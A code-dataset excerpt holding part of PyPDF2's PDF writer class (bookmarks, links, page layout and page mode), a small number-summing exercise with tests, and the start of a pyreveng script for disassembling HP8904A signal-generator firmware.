ArrayObject):\n for i in range(len(data)):\n value = self._sweep_indirect_references(extern_map, data[i])\n if isinstance(value, StreamObject):\n # an array value is a stream. streams must be indirect\n # objects, so we need to change this value\n value = self._add_object(value)\n data[i] = value\n return data\n elif isinstance(data, IndirectObject):\n # internal indirect references are fine\n if data.pdf == self:\n if data.idnum in self.stack:\n return data\n else:\n self.stack.append(data.idnum)\n realdata = self.get_object(data)\n self._sweep_indirect_references(extern_map, realdata)\n return data\n else:\n if hasattr(data.pdf, \"stream\") and data.pdf.stream.closed:\n raise ValueError(\n f\"I/O operation on closed file: {data.pdf.stream.name}\"\n )\n newobj = (\n extern_map.get(data.pdf, {})\n .get(data.generation, {})\n .get(data.idnum, None)\n )\n if newobj is None:\n try:\n newobj = data.pdf.get_object(data)\n hash_value = None\n if newobj is not None:\n hash_value = newobj.hash_value()\n # Check if object is already added to pdf.\n if hash_value in self._idnum_hash:\n return IndirectObject(self._idnum_hash[hash_value], 0, self)\n self._objects.append(None) # placeholder\n idnum = len(self._objects)\n if hash_value is not None:\n self._idnum_hash[hash_value] = idnum\n newobj_ido = IndirectObject(idnum, 0, self)\n if data.pdf not in extern_map:\n extern_map[data.pdf] = {}\n if data.generation not in extern_map[data.pdf]:\n extern_map[data.pdf][data.generation] = {}\n extern_map[data.pdf][data.generation][data.idnum] = newobj_ido\n newobj = self._sweep_indirect_references(extern_map, newobj)\n self._objects[idnum - 1] = newobj\n return newobj_ido\n except (ValueError, RecursionError):\n # Unable to resolve the Object, returning NullObject instead.\n warnings.warn(\n f\"Unable to resolve [{data.__class__.__name__}: {data}], \"\n \"returning NullObject instead\"\n )\n return NullObject()\n return newobj\n else:\n return data\n\n def get_reference(self, obj: PdfObject) -> IndirectObject:\n idnum = self._objects.index(obj) + 1\n ref = IndirectObject(idnum, 0, self)\n assert ref.get_object() == obj\n return ref\n\n def getReference(self, obj: PdfObject) -> IndirectObject: # pragma: no cover\n \"\"\"\n .. deprecated:: 1.28.0\n\n Use :meth:`get_reference` instead.\n \"\"\"\n deprecate_with_replacement(\"getReference\", \"get_reference\")\n return self.get_reference(obj)\n\n def get_outline_root(self) -> TreeObject:\n if CO.OUTLINES in self._root_object:\n # TABLE 3.25 Entries in the catalog dictionary\n outline = cast(TreeObject, self._root_object[CO.OUTLINES])\n idnum = self._objects.index(outline) + 1\n outline_ref = IndirectObject(idnum, 0, self)\n assert outline_ref.get_object() == outline\n else:\n outline = TreeObject()\n outline.update({})\n outline_ref = self._add_object(outline)\n self._root_object[NameObject(CO.OUTLINES)] = outline_ref\n\n return outline\n\n def getOutlineRoot(self) -> TreeObject: # pragma: no cover\n \"\"\"\n .. deprecated:: 1.28.0\n\n Use :meth:`get_outline_root` instead.\n \"\"\"\n deprecate_with_replacement(\"getOutlineRoot\", \"get_outline_root\")\n return self.get_outline_root()\n\n def get_named_dest_root(self) -> ArrayObject:\n if CA.NAMES in self._root_object and isinstance(\n self._root_object[CA.NAMES], DictionaryObject\n ):\n names = cast(DictionaryObject, self._root_object[CA.NAMES])\n idnum = self._objects.index(names) + 1\n names_ref = IndirectObject(idnum, 0, self)\n assert names_ref.get_object() == names\n if CA.DESTS in names and isinstance(names[CA.DESTS], DictionaryObject):\n # 3.6.3 Name Dictionary (PDF spec 1.7)\n dests = cast(DictionaryObject, names[CA.DESTS])\n idnum = self._objects.index(dests) + 1\n dests_ref = IndirectObject(idnum, 0, self)\n assert dests_ref.get_object() == dests\n if CA.NAMES in dests:\n # TABLE 3.33 Entries in a name tree node dictionary\n nd = cast(ArrayObject, dests[CA.NAMES])\n else:\n nd = ArrayObject()\n dests[NameObject(CA.NAMES)] = nd\n else:\n dests = DictionaryObject()\n dests_ref = self._add_object(dests)\n names[NameObject(CA.DESTS)] = dests_ref\n nd = ArrayObject()\n dests[NameObject(CA.NAMES)] = nd\n\n else:\n names = DictionaryObject()\n names_ref = self._add_object(names)\n self._root_object[NameObject(CA.NAMES)] = names_ref\n dests = DictionaryObject()\n dests_ref = self._add_object(dests)\n names[NameObject(CA.DESTS)] = dests_ref\n nd = ArrayObject()\n dests[NameObject(CA.NAMES)] = nd\n\n return nd\n\n def getNamedDestRoot(self) -> ArrayObject: # pragma: no cover\n \"\"\"\n .. deprecated:: 1.28.0\n\n Use :meth:`get_named_dest_root` instead.\n \"\"\"\n deprecate_with_replacement(\"getNamedDestRoot\", \"get_named_dest_root\")\n return self.get_named_dest_root()\n\n def add_bookmark_destination(\n self, dest: PageObject, parent: Optional[TreeObject] = None\n ) -> IndirectObject:\n dest_ref = self._add_object(dest)\n\n outline_ref = self.get_outline_root()\n\n if parent is None:\n parent = outline_ref\n\n parent = cast(TreeObject, parent.get_object())\n parent.add_child(dest_ref, self)\n\n return dest_ref\n\n def addBookmarkDestination(\n self, dest: PageObject, parent: Optional[TreeObject] = None\n ) -> IndirectObject: # pragma: no cover\n \"\"\"\n .. deprecated:: 1.28.0\n\n Use :meth:`add_bookmark_destination` instead.\n \"\"\"\n deprecate_with_replacement(\"addBookmarkDestination\", \"add_bookmark_destination\")\n return self.add_bookmark_destination(dest, parent)\n\n def add_bookmark_dict(\n self, bookmark: BookmarkTypes, parent: Optional[TreeObject] = None\n ) -> IndirectObject:\n bookmark_obj = TreeObject()\n for k, v in list(bookmark.items()):\n bookmark_obj[NameObject(str(k))] = v\n bookmark_obj.update(bookmark)\n\n if \"/A\" in bookmark:\n action = DictionaryObject()\n a_dict = cast(DictionaryObject, bookmark[\"/A\"])\n for k, v in list(a_dict.items()):\n action[NameObject(str(k))] = v\n action_ref = self._add_object(action)\n bookmark_obj[NameObject(\"/A\")] = action_ref\n\n bookmark_ref = self._add_object(bookmark_obj)\n\n outline_ref = self.get_outline_root()\n\n if parent is None:\n parent = outline_ref\n\n parent = parent.get_object() # type: ignore\n assert parent is not None, \"hint for mypy\"\n parent.add_child(bookmark_ref, self)\n\n return bookmark_ref\n\n def addBookmarkDict(\n self, bookmark: BookmarkTypes, parent: Optional[TreeObject] = None\n ) -> IndirectObject: # pragma: no cover\n \"\"\"\n .. deprecated:: 1.28.0\n\n Use :meth:`add_bookmark_dict` instead.\n \"\"\"\n deprecate_with_replacement(\"addBookmarkDict\", \"add_bookmark_dict\")\n return self.add_bookmark_dict(bookmark, parent)\n\n def add_bookmark(\n self,\n title: str,\n pagenum: int,\n parent: Union[None, TreeObject, IndirectObject] = None,\n color: Optional[Tuple[float, float, float]] = None,\n bold: bool = False,\n italic: bool = False,\n fit: FitType = \"/Fit\",\n *args: ZoomArgType,\n ) -> IndirectObject:\n \"\"\"\n Add a bookmark to this PDF file.\n\n :param str title: Title to use for this bookmark.\n :param int pagenum: Page number this bookmark will point to.\n :param parent: A reference to a parent bookmark to create nested\n bookmarks.\n :param tuple color: Color of the bookmark as a red, green, blue tuple\n from 0.0 to 1.0\n :param bool bold: Bookmark is bold\n :param bool italic: Bookmark is italic\n :param str fit: The fit of the destination page. See\n :meth:`addLink()` for details.\n \"\"\"\n page_ref = NumberObject(pagenum)\n action = DictionaryObject()\n zoom_args: ZoomArgsType = []\n for a in args:\n if a is not None:\n zoom_args.append(NumberObject(a))\n else:\n zoom_args.append(NullObject())\n dest = Destination(\n NameObject(\"/\" + title + \" bookmark\"), page_ref, NameObject(fit), *zoom_args\n )\n dest_array = dest.dest_array\n action.update(\n {NameObject(\"/D\"): dest_array, NameObject(\"/S\"): NameObject(\"/GoTo\")}\n )\n action_ref = self._add_object(action)\n\n outline_ref = self.get_outline_root()\n\n if parent is None:\n parent = outline_ref\n\n bookmark = _create_bookmark(action_ref, title, color, italic, bold)\n\n bookmark_ref = self._add_object(bookmark)\n\n assert parent is not None, \"hint for mypy\"\n parent_obj = cast(TreeObject, parent.get_object())\n parent_obj.add_child(bookmark_ref, self)\n\n return bookmark_ref\n\n def addBookmark(\n self,\n title: str,\n pagenum: int,\n parent: Union[None, TreeObject, IndirectObject] = None,\n color: Optional[Tuple[float, float, float]] = None,\n bold: bool = False,\n italic: bool = False,\n fit: FitType = \"/Fit\",\n *args: ZoomArgType,\n ) -> IndirectObject: # pragma: no cover\n \"\"\"\n .. deprecated:: 1.28.0\n\n Use :meth:`add_bookmark` instead.\n \"\"\"\n deprecate_with_replacement(\"addBookmark\", \"add_bookmark\")\n return self.add_bookmark(\n title, pagenum, parent, color, bold, italic, fit, *args\n )\n\n def add_named_destination_object(self, dest: PdfObject) -> IndirectObject:\n dest_ref = self._add_object(dest)\n\n nd = self.get_named_dest_root()\n nd.extend([dest[\"/Title\"], dest_ref]) # type: ignore\n return dest_ref\n\n def addNamedDestinationObject(\n self, dest: PdfObject\n ) -> IndirectObject: # pragma: no cover\n \"\"\"\n .. deprecated:: 1.28.0\n\n Use :meth:`add_named_destination_object` instead.\n \"\"\"\n deprecate_with_replacement(\n \"addNamedDestinationObject\", \"add_named_destination_object\"\n )\n return self.add_named_destination_object(dest)\n\n def add_named_destination(self, title: str, pagenum: int) -> IndirectObject:\n page_ref = self.get_object(self._pages)[PA.KIDS][pagenum] # type: ignore\n dest = DictionaryObject()\n dest.update(\n {\n NameObject(\"/D\"): ArrayObject(\n [page_ref, NameObject(\"/FitH\"), NumberObject(826)]\n ),\n NameObject(\"/S\"): NameObject(\"/GoTo\"),\n }\n )\n\n dest_ref = self._add_object(dest)\n nd = self.get_named_dest_root()\n nd.extend([title, dest_ref])\n return dest_ref\n\n def addNamedDestination(\n self, title: str, pagenum: int\n ) -> IndirectObject: # pragma: no cover\n \"\"\"\n .. deprecated:: 1.28.0\n\n Use :meth:`add_named_destination` instead.\n \"\"\"\n deprecate_with_replacement(\"addNamedDestination\", \"add_named_destination\")\n return self.add_named_destination(title, pagenum)\n\n def remove_links(self) -> None:\n \"\"\"Remove links and annotations from this output.\"\"\"\n pg_dict = cast(DictionaryObject, self.get_object(self._pages))\n pages = cast(ArrayObject, pg_dict[PA.KIDS])\n for page in pages:\n page_ref = cast(DictionaryObject, self.get_object(page))\n if PG.ANNOTS in page_ref:\n del page_ref[PG.ANNOTS]\n\n def removeLinks(self) -> None: # pragma: no cover\n \"\"\"\n .. deprecated:: 1.28.0\n\n Use :meth:`remove_links` instead.\n \"\"\"\n deprecate_with_replacement(\"removeLinks\", \"remove_links\")\n return self.remove_links()\n\n def remove_images(self, ignore_byte_string_object: bool = False) -> None:\n \"\"\"\n Remove images from this output.\n\n :param bool ignore_byte_string_object: optional parameter\n to ignore ByteString Objects.\n \"\"\"\n pg_dict = cast(DictionaryObject, self.get_object(self._pages))\n pages = cast(ArrayObject, pg_dict[PA.KIDS])\n jump_operators = (\n b\"cm\",\n b\"w\",\n b\"J\",\n b\"j\",\n b\"M\",\n b\"d\",\n b\"ri\",\n b\"i\",\n b\"gs\",\n b\"W\",\n b\"b\",\n b\"s\",\n b\"S\",\n b\"f\",\n b\"F\",\n b\"n\",\n b\"m\",\n b\"l\",\n b\"c\",\n b\"v\",\n b\"y\",\n b\"h\",\n b\"B\",\n b\"Do\",\n b\"sh\",\n )\n for page in pages:\n page_ref = cast(DictionaryObject, self.get_object(page))\n content = page_ref[\"/Contents\"].get_object()\n if not isinstance(content, ContentStream):\n content = ContentStream(content, page_ref)\n\n _operations = []\n seq_graphics = False\n for operands, operator in content.operations:\n if operator in [b\"Tj\", b\"'\"]:\n text = operands[0]\n if ignore_byte_string_object and not isinstance(\n text, TextStringObject\n ):\n operands[0] = TextStringObject()\n elif operator == b'\"':\n text = operands[2]\n if ignore_byte_string_object and not isinstance(\n text, TextStringObject\n ):\n operands[2] = TextStringObject()\n elif operator == b\"TJ\":\n for i in range(len(operands[0])):\n if ignore_byte_string_object and not isinstance(\n operands[0][i], TextStringObject\n ):\n operands[0][i] = TextStringObject()\n\n if operator == b\"q\":\n seq_graphics = True\n if operator == b\"Q\":\n seq_graphics = False\n if seq_graphics and operator in jump_operators:\n continue\n if operator == b\"re\":\n continue\n _operations.append((operands, operator))\n\n content.operations = _operations\n page_ref.__setitem__(NameObject(\"/Contents\"), content)\n\n def removeImages(\n self, ignoreByteStringObject: bool = False\n ) -> None: # pragma: no cover\n \"\"\"\n .. deprecated:: 1.28.0\n\n Use :meth:`remove_images` instead.\n \"\"\"\n deprecate_with_replacement(\"removeImages\", \"remove_images\")\n return self.remove_images(ignoreByteStringObject)\n\n def remove_text(self, ignore_byte_string_object: bool = False) -> None:\n \"\"\"\n Remove text from this output.\n\n :param bool ignore_byte_string_object: optional parameter\n to ignore ByteString Objects.\n \"\"\"\n pg_dict = cast(DictionaryObject, self.get_object(self._pages))\n pages = cast(List[IndirectObject], pg_dict[PA.KIDS])\n for page in pages:\n page_ref = cast(Dict[str, Any], self.get_object(page))\n content = page_ref[\"/Contents\"].get_object()\n if not isinstance(content, ContentStream):\n content = ContentStream(content, page_ref)\n for operands, operator in content.operations:\n if operator in [b\"Tj\", b\"'\"]:\n text = operands[0]\n if not ignore_byte_string_object:\n if isinstance(text, TextStringObject):\n operands[0] = TextStringObject()\n else:\n if isinstance(text, (TextStringObject, ByteStringObject)):\n operands[0] = TextStringObject()\n elif operator == b'\"':\n text = operands[2]\n if not ignore_byte_string_object:\n if isinstance(text, TextStringObject):\n operands[2] = TextStringObject()\n else:\n if isinstance(text, (TextStringObject, ByteStringObject)):\n operands[2] = TextStringObject()\n elif operator == b\"TJ\":\n for i in range(len(operands[0])):\n if not ignore_byte_string_object:\n if isinstance(operands[0][i], TextStringObject):\n operands[0][i] = TextStringObject()\n else:\n if isinstance(\n operands[0][i], (TextStringObject, ByteStringObject)\n ):\n operands[0][i] = TextStringObject()\n\n page_ref.__setitem__(NameObject(\"/Contents\"), content)\n\n def removeText(\n self, ignoreByteStringObject: bool = False\n ) -> None: # pragma: no cover\n \"\"\"\n .. deprecated:: 1.28.0\n\n Use :meth:`remove_text` instead.\n \"\"\"\n deprecate_with_replacement(\"removeText\", \"remove_text\")\n return self.remove_text(ignoreByteStringObject)\n\n def add_uri(\n self,\n pagenum: int,\n uri: int,\n rect: RectangleObject,\n border: Optional[ArrayObject] = None,\n ) -> None:\n \"\"\"\n Add an URI from a rectangular area to the specified page.\n This uses the basic structure of :meth:`add_link`\n\n :param int pagenum: index of the page on which to place the URI action.\n :param int uri: string -- uri of resource to link to.\n :param rect: :class:`RectangleObject` or array of four\n integers specifying the clickable rectangular area\n ``[xLL, yLL, xUR, yUR]``, or string in the form ``\"[ xLL yLL xUR yUR ]\"``.\n :param border: if provided, an array describing border-drawing\n properties. See the PDF spec for details. No border will be\n drawn if this argument is omitted.\n \"\"\"\n\n page_link = self.get_object(self._pages)[PA.KIDS][pagenum] # type: ignore\n page_ref = cast(Dict[str, Any], self.get_object(page_link))\n\n border_arr: BorderArrayType\n if border is not None:\n border_arr = [NameObject(n) for n in border[:3]]\n if len(border) == 4:\n dash_pattern = ArrayObject([NameObject(n) for n in border[3]])\n border_arr.append(dash_pattern)\n else:\n border_arr = [NumberObject(2)] * 3\n\n if isinstance(rect, str):\n rect = NameObject(rect)\n elif isinstance(rect, RectangleObject):\n pass\n else:\n rect = RectangleObject(rect)\n\n lnk2 = DictionaryObject()\n lnk2.update(\n {\n NameObject(\"/S\"): NameObject(\"/URI\"),\n NameObject(\"/URI\"): TextStringObject(uri),\n }\n )\n lnk = DictionaryObject()\n lnk.update(\n {\n NameObject(\"/Type\"): NameObject(PG.ANNOTS),\n NameObject(\"/Subtype\"): NameObject(\"/Link\"),\n NameObject(\"/P\"): page_link,\n NameObject(\"/Rect\"): rect,\n NameObject(\"/H\"): NameObject(\"/I\"),\n NameObject(\"/Border\"): ArrayObject(border_arr),\n NameObject(\"/A\"): lnk2,\n }\n )\n lnk_ref = self._add_object(lnk)\n\n if PG.ANNOTS in page_ref:\n page_ref[PG.ANNOTS].append(lnk_ref)\n else:\n page_ref[NameObject(PG.ANNOTS)] = ArrayObject([lnk_ref])\n\n def addURI(\n self,\n pagenum: int,\n uri: int,\n rect: RectangleObject,\n border: Optional[ArrayObject] = None,\n ) -> None: # pragma: no cover\n \"\"\"\n .. deprecated:: 1.28.0\n\n Use :meth:`add_uri` instead.\n \"\"\"\n deprecate_with_replacement(\"addURI\", \"add_uri\")\n return self.add_uri(pagenum, uri, rect, border)\n\n def add_link(\n self,\n pagenum: int,\n pagedest: int,\n rect: RectangleObject,\n border: Optional[ArrayObject] = None,\n fit: FitType = \"/Fit\",\n *args: ZoomArgType,\n ) -> None:\n \"\"\"\n Add an internal link from a rectangular area to the specified page.\n\n :param int pagenum: index of the page on which to place the link.\n :param int pagedest: index of the page to which the link should go.\n :param rect: :class:`RectangleObject` or array of four\n integers specifying the clickable rectangular area\n ``[xLL, yLL, xUR, yUR]``, or string in the form ``\"[ xLL yLL xUR yUR ]\"``.\n :param border: if provided, an array describing border-drawing\n properties. See the PDF spec for details. No border will be\n drawn if this argument is omitted.\n :param str fit: Page fit or 'zoom' option (see below). Additional arguments may need\n to be supplied. Passing ``None`` will be read as a null value for that coordinate.\n\n .. list-table:: Valid ``zoom`` arguments (see Table 8.2 of the PDF 1.7 reference for details)\n :widths: 50 200\n\n * - /Fit\n - No additional arguments\n * - /XYZ\n - [left] [top] [zoomFactor]\n * - /FitH\n - [top]\n * - /FitV\n - [left]\n * - /FitR\n - [left] [bottom] [right] [top]\n * - /FitB\n - No additional arguments\n * - /FitBH\n - [top]\n * - /FitBV\n - [left]\n \"\"\"\n pages_obj = cast(Dict[str, Any], self.get_object(self._pages))\n page_link = pages_obj[PA.KIDS][pagenum]\n page_dest = pages_obj[PA.KIDS][pagedest] # TODO: switch for external link\n page_ref = cast(Dict[str, Any], self.get_object(page_link))\n\n border_arr: BorderArrayType\n if border is not None:\n border_arr = [NameObject(n) for n in border[:3]]\n if len(border) == 4:\n dash_pattern = ArrayObject([NameObject(n) for n in border[3]])\n border_arr.append(dash_pattern)\n else:\n border_arr = [NumberObject(0)] * 3\n\n if isinstance(rect, str):\n rect = NameObject(rect)\n elif isinstance(rect, RectangleObject):\n pass\n else:\n rect = RectangleObject(rect)\n\n zoom_args: ZoomArgsType = []\n for a in args:\n if a is not None:\n zoom_args.append(NumberObject(a))\n else:\n zoom_args.append(NullObject())\n dest = Destination(\n NameObject(\"/LinkName\"), page_dest, NameObject(fit), *zoom_args\n ) # TODO: create a better name for the link\n dest_array = dest.dest_array\n\n lnk = DictionaryObject()\n lnk.update(\n {\n NameObject(\"/Type\"): NameObject(PG.ANNOTS),\n NameObject(\"/Subtype\"): NameObject(\"/Link\"),\n NameObject(\"/P\"): page_link,\n NameObject(\"/Rect\"): rect,\n NameObject(\"/Border\"): ArrayObject(border_arr),\n NameObject(\"/Dest\"): dest_array,\n }\n )\n lnk_ref = self._add_object(lnk)\n\n if PG.ANNOTS in page_ref:\n page_ref[PG.ANNOTS].append(lnk_ref)\n else:\n page_ref[NameObject(PG.ANNOTS)] = ArrayObject([lnk_ref])\n\n def addLink( # pragma: no cover\n self,\n pagenum: int,\n pagedest: int,\n rect: RectangleObject,\n border: Optional[ArrayObject] = None,\n fit: FitType = \"/Fit\",\n *args: ZoomArgType,\n ) -> None:\n \"\"\"\n .. deprecated:: 1.28.0\n\n Use :meth:`add_link` instead.\n \"\"\"\n deprecate_with_replacement(\"addLink\", \"add_link\")\n return self.add_link(pagenum, pagedest, rect, border, fit, *args)\n\n _valid_layouts = (\n \"/NoLayout\",\n \"/SinglePage\",\n \"/OneColumn\",\n \"/TwoColumnLeft\",\n \"/TwoColumnRight\",\n \"/TwoPageLeft\",\n \"/TwoPageRight\",\n )\n\n def _get_page_layout(self) -> Optional[LayoutType]:\n try:\n return cast(LayoutType, self._root_object[\"/PageLayout\"])\n except KeyError:\n return None\n\n def getPageLayout(self) -> Optional[LayoutType]: # pragma: no cover\n \"\"\"\n .. deprecated:: 1.28.0\n\n Use :py:attr:`page_layout` instead.\n \"\"\"\n deprecate_with_replacement(\"getPageLayout\", \"page_layout\")\n return self._get_page_layout()\n\n def _set_page_layout(self, layout: Union[NameObject, LayoutType]) -> None:\n \"\"\"\n Set the page layout.\n\n :param str layout: The page layout to be used.\n\n .. list-table:: Valid ``layout`` arguments\n :widths: 50 200\n\n * - /NoLayout\n - Layout explicitly not specified\n * - /SinglePage\n - Show one page at a time\n * - /OneColumn\n - Show one column at a time\n * - /TwoColumnLeft\n - Show pages in two columns, odd-numbered pages on the left\n * - /TwoColumnRight\n - Show pages in two columns, odd-numbered pages on the right\n * - /TwoPageLeft\n - Show two pages at a time, odd-numbered pages on the left\n * - /TwoPageRight\n - Show two pages at a time, odd-numbered pages on the right\n \"\"\"\n if not isinstance(layout, NameObject):\n if layout not in self._valid_layouts:\n warnings.warn(\n f\"Layout should be one of: {'', ''.join(self._valid_layouts)}\"\n )\n layout = NameObject(layout)\n self._root_object.update({NameObject(\"/PageLayout\"): layout})\n\n def setPageLayout(self, layout: LayoutType) -> None: # pragma: no cover\n \"\"\"\n .. deprecated:: 1.28.0\n\n Use :py:attr:`page_layout` instead.\n \"\"\"\n deprecate_with_replacement(\n \"writer.setPageLayout(val)\", \"writer.page_layout = val\"\n )\n return self._set_page_layout(layout)\n\n @property\n def page_layout(self) -> Optional[LayoutType]:\n \"\"\"\n Page layout property.\n\n .. list-table:: Valid ``layout`` values\n :widths: 50 200\n\n * - /NoLayout\n - Layout explicitly not specified\n * - /SinglePage\n - Show one page at a time\n * - /OneColumn\n - Show one column at a time\n * - /TwoColumnLeft\n - Show pages in two columns, odd-numbered pages on the left\n * - /TwoColumnRight\n - Show pages in two columns, odd-numbered pages on the right\n * - /TwoPageLeft\n - Show two pages at a time, odd-numbered pages on the left\n * - /TwoPageRight\n - Show two pages at a time, odd-numbered pages on the right\n \"\"\"\n return self._get_page_layout()\n\n @page_layout.setter\n def page_layout(self, layout: LayoutType) -> None:\n self._set_page_layout(layout)\n\n @property\n def pageLayout(self) -> Optional[LayoutType]: # pragma: no cover\n \"\"\"\n .. deprecated:: 1.28.0\n\n Use :py:attr:`page_layout` instead.\n \"\"\"\n deprecate_with_replacement(\"pageLayout\", \"page_layout\")\n return self.page_layout\n\n @pageLayout.setter\n def pageLayout(self, layout: LayoutType) -> None: # pragma: no cover\n \"\"\"\n .. deprecated:: 1.28.0\n\n Use :py:attr:`page_layout` instead.\n \"\"\"\n deprecate_with_replacement(\"pageLayout\", \"page_layout\")\n self.page_layout = layout\n\n _valid_modes = (\n \"/UseNone\",\n \"/UseOutlines\",\n \"/UseThumbs\",\n \"/FullScreen\",\n \"/UseOC\",\n \"/UseAttachments\",\n )\n\n def _get_page_mode(self) -> Optional[PagemodeType]:\n try:\n return cast(PagemodeType, self._root_object[\"/PageMode\"])\n except KeyError:\n return None\n\n def getPageMode(self) -> Optional[PagemodeType]: # pragma: no cover\n \"\"\"\n .. deprecated:: 1.28.0\n\n Use :py:attr:`page_mode` instead.\n \"\"\"\n deprecate_with_replacement(\"getPageMode\", \"page_mode\")\n return self._get_page_mode()\n\n def set_page_mode(self, mode: PagemodeType) -> None:\n \"\"\"\n .. deprecated:: 1.28.0\n\n Use :py:attr:`page_mode` instead.\n \"\"\"\n if isinstance(mode, NameObject):\n mode_name: NameObject = mode\n else:\n if mode not in self._valid_modes:\n warnings.warn(f\"Mode should be one of: {', '.join(self._valid_modes)}\")\n mode_name = NameObject(mode)\n self._root_object.update({NameObject(\"/PageMode\"): mode_name})\n\n def setPageMode(self, mode: PagemodeType) -> None: # pragma: no cover\n \"\"\"\n .. deprecated:: 1.28.0\n\n Use :py:attr:`page_mode` instead.\n \"\"\"\n deprecate_with_replacement(\"writer.setPageMode(val)\", \"writer.page_mode = val\")\n self.set_page_mode(mode)\n\n @property\n def page_mode(self) -> Optional[PagemodeType]:\n \"\"\"\n Page mode property.\n\n .. list-table:: Valid ``mode`` values\n :widths: 50 200\n\n * - /UseNone\n - Do not show outlines or thumbnails panels\n * - /UseOutlines\n - Show outlines (aka bookmarks) panel\n * - /UseThumbs\n - Show page thumbnails panel\n * - /FullScreen\n - Fullscreen view\n * - /UseOC\n - Show Optional Content Group (OCG) panel\n * - /UseAttachments\n - Show attachments panel\n \"\"\"\n return self._get_page_mode()\n\n @page_mode.setter\n def page_mode(self, mode: PagemodeType) -> None:\n self.set_page_mode(mode)\n\n @property\n def pageMode(self) -> Optional[PagemodeType]: # pragma: no cover\n \"\"\"\n .. deprecated:: 1.28.0\n\n Use :py:attr:`page_mode` instead.\n \"\"\"\n deprecate_with_replacement(\"pageMode\", \"page_mode\")\n return self.page_mode\n\n @pageMode.setter\n def pageMode(self, mode: PagemodeType) -> None: # pragma: no cover\n \"\"\"\n .. deprecated:: 1.28.0\n\n Use :py:attr:`page_mode` instead.\n \"\"\"\n deprecate_with_replacement(\"pageMode\", \"page_mode\")\n self.page_mode = mode\n\n\nclass PdfFileWriter(PdfWriter): # pragma: no cover\n def __init__(self, *args: Any, **kwargs: Any) -> None:\n deprecate_with_replacement(\"PdfFileWriter\", \"PdfWriter\")\n super().__init__(*args, **kwargs)\n","sub_path":"PyPDF2/_writer.py","file_name":"_writer.py","file_ext":"py","file_size_in_byte":64065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"335760555","text":"def number_addition(str):\n sum = 0\n i = 0\n while i < len(str):\n if str[i].isdigit():\n j = i + 1\n while j < len(str) and str[j].isdigit():\n j += 1\n digit = int(str[i:j])\n sum += digit\n i = j + 1\n else:\n i += 1\n return sum\n\nprint(\"number_addition tests\")\ntests = [( \"88Hello 3World!\", 91), (\"75Number9\", 84), (\"10 2One Number*1*\", 13)]\nfor test in tests:\n result = number_addition(test[0])\n if result == test[1]:\n print(\"PASS: %d\" % result)\n else:\n print(\"FAIL: %d\" % result)","sub_path":"easy/number_addition.py","file_name":"number_addition.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"97838608","text":"#!/usr/bin/env python\n#\n# Copyright (c) 2012-2014 Poul-Henning Kamp \n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions\n# are met:\n# 1. Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# 2. Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n#\n# THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND\n# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED. IN NO EVENT SHALL AUTHOR OR CONTRIBUTORS BE LIABLE\n# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS\n# OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)\n# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT\n# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY\n# OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF\n# SUCH DAMAGE.\n\nfrom __future__ import print_function\n\nimport os\nfrom pyreveng import job, mem, listing, data, code, assy\nimport pyreveng.cpu.mc6809 as mc6809\n\nfwd=\"/critter/Doc/TestAndMeasurement/HP8904A/FW/\"\n\n#######################################################################\n# The HP8904A has five memory pages, four of which occupy the same\n# address space. We analyse them separately.\n\ndef setup(pg=4):\n\tif pg < 4:\n\t\tm = mem.byte_mem(0x4000, 0x8000)\n\t\tfi = open(fwd + \"/08904-87008.hex\")\n\t\tfor i in fi:\n\t\t\tj = i.split()\n\t\t\tif int(j[0],10) == pg:\n\t\t\t\tm.wr(int(j[1],16), int(j[2],16))\n\t\tfi.close()\n\telse:\n\t\tm = mem.byte_mem(0x8000, 0x10000)\n\t\tm.load_binfile(0x8000, 1, fwd + \"08904-87007.bin\")\n\n\tpj = job.Job(m, \"HP8904A_pg%d\" % pg)\n\tpj.pg = pg\n\treturn pj,m\n\n#######################################################################\n\nhpib = {\n\t\"AHR\":\t\"Amplitude Hop\",\n\t\"DPE\":\t\"Digital Port\",\n\t\"FRH\":\t\"Frequncy Hop Mode\",\n\t\"FHR\":\t\"Frequncy Hop\",\n\t\"HRA\":\t\"Hop Register\",\n\t\"PHH\":\t\"Phase Hop Mode\",\n\t\"PHR\":\t\"Phase Hop\",\n\t\"QRE\":\t\"Query Port Status\",\n\t\"LO\":\t\"Gaussian Filter\",\n\t\"SH\":\t\"Sharp Filter\",\n\t\"AU\":\t\"Auto Filter\",\n\t\"SI\":\t\"Sine\",\n\t\"RA\":\t\"Ramp\",\n\t\"TR\":\t\"Triangle\",\n\t\"SQ\":\t\"Square\",\n\t\"NS\":\t\"Noise\",\n\t\"DC\":\t\"DC\",\n\t\"KZ\":\t\"kHz\",\n\t\"HZ\":\t\"Hz\",\n\t\"DG\":\t\"Degrees\",\n\t\"RD\":\t\"Radians\",\n\t\"VL\":\t\"Volts\",\n\t\"MV\":\t\"Millivolts\",\n\t\"UV\":\t\"Microvolts\",\n\t\"ET\":\t\"Enter\",\n\t\"SC\":\t\"Seconds\",\n\t\"MS\":\t\"Milliseconds\",\n\t\"PC\":\t\"Percent\",\n\t\"UP\":\t\"Increment Up\",\n\t\"DN\":\t\"Increment Down\",\n\t\"SEQE\":\t\"Sequence end\",\n\t\"SEQP\":\t\"Sequence index\",\n\t\"WSQ\":\t\"Sequence string\",\n\t\"FRH\":\t\"Tone 